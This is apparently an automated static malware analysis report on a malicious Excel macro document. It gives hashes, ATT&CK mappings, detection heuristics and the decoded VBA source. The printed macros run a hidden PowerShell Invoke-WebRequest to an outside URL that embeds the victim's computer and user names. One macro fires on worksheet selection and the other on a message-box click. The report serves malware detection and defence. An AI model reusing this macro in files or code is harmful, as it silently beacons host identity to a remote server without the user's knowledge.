Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 56c91ae7569f93bb…

MALICIOUS

Office (OOXML)

14.8 KB Created: 2021-11-09 13:37:14 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-11-24
MD5: b69c7e64a5a72ae9f7eb28812f8c838a SHA-1: 5b2d28cb41135b067cedba422e04d5cbe0f56ca8 SHA-256: 56c91ae7569f93bb7fd7ef61833a8ca815820a76ecf3935afa0f6f34520537c8
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The OOXML document contains VBA macros that trigger on selection change or user interaction. These macros execute a PowerShell command using Invoke-WebRequest to download content from a dynamically constructed URL. The URL is built using environment variables, suggesting an attempt to evade static detection or personalize the download. The presence of Shell() and PowerShell references in the VBA code strongly indicates a downloader or initial execution stage.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        If Not Intersect(Target, Range("A1:Z50")) Is Nothing Then _
        Call Shell("powershell.exe -command Invoke-WebRequest -Uri https://static.rzeszow.uw.gov.pl/$env:computername/$env:username/", vbHide)
End Sub
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        If Not Intersect(Target, Range("A1:Z50")) Is Nothing Then _
        Call Shell("powershell.exe -command Invoke-WebRequest -Uri https://static.rzeszow.uw.gov.pl/$env:computername/$env:username/", vbHide)
End Sub
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://static.rzeszow.uw.gov.pl/$env:computername/$env:username/ In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1271 bytes
SHA-256: f17ed9b1a5d2da8e61ce38c30cc9211548c2fe3373c770a7a7020fce833242be
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Not Intersect(Target, Range("A1:Z50")) Is Nothing Then _
        Call Shell("powershell.exe -command Invoke-WebRequest -Uri https://static.rzeszow.uw.gov.pl/$env:computername/$env:username/", vbHide)
End Sub




Attribute VB_Name = "Module1"
Sub MessagesYesNoWithResponse()
    If MsgBox("Do you wish to continue? ", vbYesNo) = vbYes Then
        MsgBox "The user clicked Yes"
    Else
        Call Shell("powershell.exe -command Invoke-WebRequest -Uri https://static.rzeszow.uw.gov.pl/$env:computername/$env:username/", vbHide)
    End If
End Sub

Attribute VB_Name = "Module2"
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19968 bytes
SHA-256: ab1e4b5d90326d5ff0a752a9d1d0c970a7b7af799b3fa49c0bc4e2dc80c3360a

Open this report in the interactive analyzer, or submit your own file for analysis.